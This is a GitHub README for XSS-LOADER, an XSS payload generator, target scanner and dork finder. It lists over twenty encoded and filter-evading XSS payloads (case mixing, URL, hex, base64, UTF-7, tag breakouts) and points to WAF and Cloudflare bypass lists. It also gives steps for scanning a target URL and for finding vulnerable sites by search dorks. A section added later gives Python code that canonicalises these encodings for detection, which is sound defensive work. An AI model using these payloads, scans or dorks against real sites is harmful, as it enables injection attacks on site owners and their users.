capture0x / Xss Loader

Licence: cc0-1.0
Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder

💎   XSS-LOADER TOOLS   💎

Written by TMRSWRR

Version 1.0.0

All-in-one tool: XSS PAYLOAD GENERATOR - XSS SCANNER - XSS DORK FINDER

Instagram: TMRSWRR

📒 Read Me 📒

  • This tool creates payloads for use in XSS injection
  • Select a default payload tag from the parameters, or write your own payload
  • It performs XSS injection with the Xss Scanner parameter
  • It finds URLs of vulnerable sites with the Xss Dork Finder parameter

💿 Installation 💿

Installation with requirements.txt

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Usage

python3 payloader.py

🗃️ Features 🗃️

*Basic Payload

Sets default parameter to: <script>alert(1)</script>

*Div Payload

Sets default parameter to: <div onpointerover='alert(1)'>MOVE HERE</div>

*Img Payload

Sets default parameter to: <img src=x onerror=alert('1');>

*Body Payload

Sets default parameter to: <body ontouchstart=alert(1)>

*Svg Payload

Sets default parameter to: <svg onload=alert('1')>

*Enter Your Payload

Encodes a payload written by the user

*Payload Generator Parameter

Encodes the payload for the selected tag

* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL ENCODE ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML ENTITY ENCODE----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  SPLIT PAYLOAD ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX ENCODE ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 ENCODE -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 ENCODE----->  Encode payload to utf-32 format.          
* |   9.  DELETE TAG -----> ";alert('XSS');//            
* |  10.  UNICODE ENCODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII ENCODE ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 ENCODE ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 ENCODE ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  PARENTHESIS BYPASS ----->  <script>alert`1`</script>   
* |  15.  UTF-8 ENCODE ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* |  19.  INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* |  20.  MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* |  22.  SPACE BYPASS-----> <img^Lsrc=x^Lonerror=alert('1');>
* |  23.  DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* |  25.  CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* |  26.  POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* |  27.  ALERT PAYLOADS-----> Show Alert Payload List
* |  28.  ALL CREATE PAYLOAD-----> Show Create All Payloads
* |  29.  GO BACK MAIN MENU
* |  30.  EXIT
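
For defenders, the point of the list above is that one piece of markup arrives under many encodings, so an input filter or log detection rule has to canonicalize before it matches. The following is an added example, not part of XSS-LOADER; the function names and the tag list are assumptions, and the sample strings are variants 1, 2, 3, 4, 6, 10 and 12 copied from the list:

```python
import base64
import html
import re
import unicodedata
from urllib.parse import unquote

PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")          # non-standard %uXXXX escapes
HEX_ONLY = re.compile(r"(?:[0-9a-fA-F]{2}){4,}")    # value is nothing but hex pairs
B64_ONLY = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")   # value is nothing but base64
# Assumed tag list: the tags used by the tool's default payloads.
TAG = re.compile(r"<\s*/?\s*(?:script|img|svg|body|div|noscript)\b")

# Sample inputs, taken from the menu listing on this page.
SAMPLES = [
    "<SCRIPT>ALERT(1)</SCRIPT>",
    "<ScRiPt>aleRt(1)</ScRiPt>",
    "%3Cscript%3Ealert%281%29%3C%2Fscript%3E",
    "&lt;script&gt;alert(1)&lt;/script&gt;",
    "3c7363726970743e616c6572742831293c2f7363726970743e",
    "%uff1cscript%uff1ealert(1)%uff1c/script%uff1e",
    "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
]

def _decode_once(value):
    out = PCT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
    out = html.unescape(unquote(out))
    out = unicodedata.normalize("NFKC", out)   # fullwidth < > fold to ASCII
    try:
        if HEX_ONLY.fullmatch(out):
            out = bytes.fromhex(out).decode("utf-8")
        elif B64_ONLY.fullmatch(out) and len(out) % 4 == 0:
            out = base64.b64decode(out, validate=True).decode("utf-8")
    except ValueError:
        pass  # not valid text after decoding: keep the value as it was
    return out

def canonicalize(value, max_rounds=5):
    """Decode repeatedly (bounded) so nested encodings collapse, then case-fold."""
    for _ in range(max_rounds):
        decoded = _decode_once(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()

def looks_like_markup(value):
    return bool(TAG.search(canonicalize(value)))

if __name__ == "__main__":
    for s in SAMPLES:
        print(looks_like_markup(s), canonicalize(s))
```

Variants that need no tag (such as 9) or that rely on invalid byte sequences (such as 15) are not caught by this match, which is why context-aware output encoding, not input matching, is the actual fix.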

*Xss Scanner

First, enter the URL of the target. Enter the URL like this example: e.g. target -----> http://target.com/index.php?name=

Payload lists that can be selected for scanning:

  • BASIC PAYLOAD LIST ==> Payload list consisting of script tag
  • DIV PAYLOAD LIST ==> Payload list consisting of div tag
  • IMG PAYLOAD LIST ==> Payload list consisting of img tag
  • BODY PAYLOAD LIST ==> Payload list consisting of body tag
  • SVG PAYLOAD LIST ==> Payload list consisting of svg tag
  • MIXED PAYLOAD LIST ==> Payload list consisting of all tags
  • ENTER FILE PATH ==> Payload list determined by the user. Enter the path like this example (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Results will be added to "vulnpayload.txt" after scanning.

*Xss Dork Finder

First, enter the dork to search for: e.g. ----> inurl:"search.php?q="

Results will be saved in "dork.txt" after scanning.

Known Issues

Fixed:

  • Unicode errors

  • Module errors

Important:

If you want to use the tool with python3 installed on Windows, download it from the link below:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Copyright 2020
